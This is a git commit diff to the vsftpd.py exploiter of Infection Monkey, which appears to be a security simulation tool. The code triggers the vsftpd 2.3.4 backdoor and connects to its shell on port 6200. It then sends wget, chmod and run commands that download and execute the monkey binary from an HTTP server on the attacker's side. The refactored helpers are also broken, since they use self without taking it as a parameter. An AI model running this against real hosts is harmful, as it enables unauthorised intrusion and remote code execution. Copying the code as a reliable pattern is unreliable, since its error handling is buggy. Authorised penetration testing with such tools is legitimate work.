Update vsftpd.py

implemented 3 functions socket_connect, socket_send,socket_send_recv to handle the exception as advised.
2019-04-18 20:48:24 +02:00 · 2019-04-18 20:48:24 +02:00 · 9e5292dc8e
parent 525e541156
commit 9e5292dc8e
1 changed files with 116 additions and 74 deletions
--- a/monkey/infection_monkey/exploit/vsftpd.py
+++ b/monkey/infection_monkey/exploit/vsftpd.py
@ -30,92 +30,134 @@ class VSFTPDExploiter(HostExploiter):
        super(VSFTPDExploiter, self).__init__(host)
        self.skip_exist = self._config.skip_exploit_if_file_exist

+    def socket_connect(s,ip_addr,port):
+        try:
+            s.connect((ip_addr,port))
+            return True
+        except socket.error as e:
+            LOG.error('Failed to connect to %s' , self.host.ip_addr)
+        
+        return False 
+
+    def socket_send_recv(s,message):
+        try:
+            s.send(message)
+            return s.recv(128).decode('utf-8')
+            
+        except socket.error as e:
+            LOG.error('Failed to send payload to %s' , self.host.ip_addr)
+
+        return False
+
+    def socket_send(s,message):
+        try:
+            s.send(message)
+            return True
+            
+        except socket.error as e:
+            LOG.error('Failed to send payload to %s' , self.host.ip_addr)
+
+        return False
+
+
+
    def exploit_host(self):
-        try:
-            LOG.info('Attempting to trigger backdoor...')
-            ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-            ftp_socket.connect((self.host.ip_addr, FTP_PORT))
+        
+        LOG.info('Attempting to trigger backdoor...')
+        ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+            
+        if socket_connect(ftp_socket,self.host.ip_addr, FTP_PORT):
            ftp_socket.recv(128).decode('utf-8')
-            # Attempt to login to trigger backdoor
-            ftp_socket.send(USERNAME)
-            ftp_socket.recv(128).decode('utf-8')
-            ftp_socket.send(PASSWORD)
-            ftp_socket.recv(128).decode('utf-8')
-            ftp_socket.close()
-            LOG.info('Triggered backdoor')

-        except socket.error as e:
-            LOG.error('Failed to trigger backdoor on %s' , self.host.ip_addr)
+        # Attempt to login to trigger backdoor
            
-        try:
-            LOG.info('Attempting to connect to backdoor...')
-            backdoor_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-            backdoor_socket.connect((self.host.ip_addr, 6200))
-            LOG.info('Connected to backdoor on %s:6200', self.host.ip_addr)
-            
-            command = str.encode("uname -m" + '\n')
-            backdoor_socket.send(command)
-            response = backdoor_socket.recv(128).decode('utf-8')
-            LOG.info('Response for uname -m: %s', response)
-            if '' != response.lower().strip():
-                #command execution is successful
-                self.host.os['machine'] = response.lower().strip()
-                self.host.os['type'] = 'linux'
-
-            else :
-                LOG.info("Failed to execute command uname -m on victim %r ",self.host)
-
-            src_path = get_target_monkey(self.host)
-            LOG.info("src for suitable monkey executable for host %r is %s", self.host,src_path)
-
-            if not src_path:
-                LOG.info("Can't find suitable monkey executable for host %r", self.host)
+        if socket_send_recv(ftp_socket,USERNAME):
+            if socket_send_recv(ftp_socket,PASSWORD):
+                ftp_socket.close()
+                LOG.info('Triggered backdoor')
+            else:
+                LOG.error('Failed to trigger backdoor on %s' , self.host.ip_addr)
                return False
-
-            
-            LOG.info('Connected to backdoor on %s:6200', self.host.ip_addr)
-
-            #copy the monkey into the machine
-            http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path)
-            dropper_target_path_linux = self._config.dropper_target_path_linux
-            LOG.info("Download link for monkey is %s",http_path)    
-
-            #download the monkey
-            download_command = '/usr/bin/wget %s -O %s;' %  (
-                http_path, dropper_target_path_linux)
-            LOG.info("Download_command is %s",download_command)            
-            
-            command = str.encode(str(download_command) + '\n')
-            backdoor_socket.send(command)
-            http_thread.join(DOWNLOAD_TIMEOUT)
-            http_thread.stop()
-
-            #changeit to executable
-            
-            execute_command = "/bin/chmod +x %s" % dropper_target_path_linux
-            LOG.info("Execute_command is %s",execute_command)
-            
-            command = str.encode(str(execute_command) + '\n')
-            
-            backdoor_socket.send(command)
-            
-
-            #run the monkey            
-            cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG)
-            cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1)
-            cmdline += "&"
-	    	
-            command = str.encode(str(cmdline) + '\n')
-            backdoor_socket.send(command)
-	    
-            LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
-                     self._config.dropper_target_path_linux, self.host, cmdline)
-            
-            self._exploit_info['Vulnerability'] = {"Success":"True"}
-                     
-        except socket.error as e:
-            LOG.error('Failed to connect to backdoor on %s:6200', self.host.ip_addr)
-            LOG.error('Error Connecting to backdoor. Error: %s' % e)
+        else:
+            LOG.error('Failed to trigger backdoor on %s' , self.host.ip_addr)
            return False 

+        LOG.info('Attempting to connect to backdoor...')
+        backdoor_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+        if socket_connect(backdoor_socket,self.host.ip_addr, 6200):
+            LOG.info('Connected to backdoor on %s:6200', self.host.ip_addr)
+            
+        command = str.encode("uname -m" + '\n')
+        
+        response = socket_send_recv(backdoor_socket,command)
+        if response:
+            LOG.info('Response for uname -m: %s', response)
+            if '' != response.lower().strip():
+                # command execution is successful
+                self.host.os['machine'] = response.lower().strip()
+                self.host.os['type'] = 'linux'
+        else :
+            LOG.info("Failed to execute command uname -m on victim %r ",self.host)
+
+        src_path = get_target_monkey(self.host)
+        LOG.info("src for suitable monkey executable for host %r is %s", self.host,src_path)
+
+        if not src_path:
+            LOG.info("Can't find suitable monkey executable for host %r", self.host)
+            return False
+
+        
+        # copy the monkey into the machine
+        http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path)
+        dropper_target_path_linux = self._config.dropper_target_path_linux
+        LOG.info("Download link for monkey is %s",http_path)    
+
+        # download the monkey
+        download_command = '/usr/bin/wget %s -O %s;' %  (
+            http_path, dropper_target_path_linux)
+        LOG.info("Download_command is %s",download_command)            
+            
+        download_command = str.encode(str(download_command) + '\n')
+        
+        if socket_send(backdoor_socket,download_command):
+            LOG.info('Monkey is now Downloaded ')
+        else:
+            LOG.error('Failed to download monkey at %s' , self.host.ip_addr)
+            return False
+            
+        http_thread.join(DOWNLOAD_TIMEOUT)
+        http_thread.stop()
+
+        # changeit to executable
+            
+        Change_exec_permission = "/bin/chmod +x %s" % dropper_target_path_linux
+        LOG.info("Change_exec_permission is %s",Change_exec_permission)
+            
+        Change_exec_permission = str.encode(str(Change_exec_permission) + '\n')
+            
+        if socket_send(backdoor_socket,Change_exec_permission):
+            LOG.info('Monkey can now be executed ')
+        else:
+            LOG.error('Failed to make the monkey executable at %s' , self.host.ip_addr)
+            return False
+            
+
+        # run the monkey            
+        cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG)
+        cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1)
+        cmdline += "&"
+	    	
+        run_monkey = str.encode(str(cmdline) + '\n')
+        if socket_send(backdoor_socket,run_monkey):
+            LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
+                    self._config.dropper_target_path_linux, self.host, cmdline)
+        else:
+            LOG.error('Monkey failed to run at %s' , self.host.ip_addr)
+            return False
+	    
+                   
+        self._exploit_info['Vulnerability'] = {"Success":"True"}
+       
+
        return True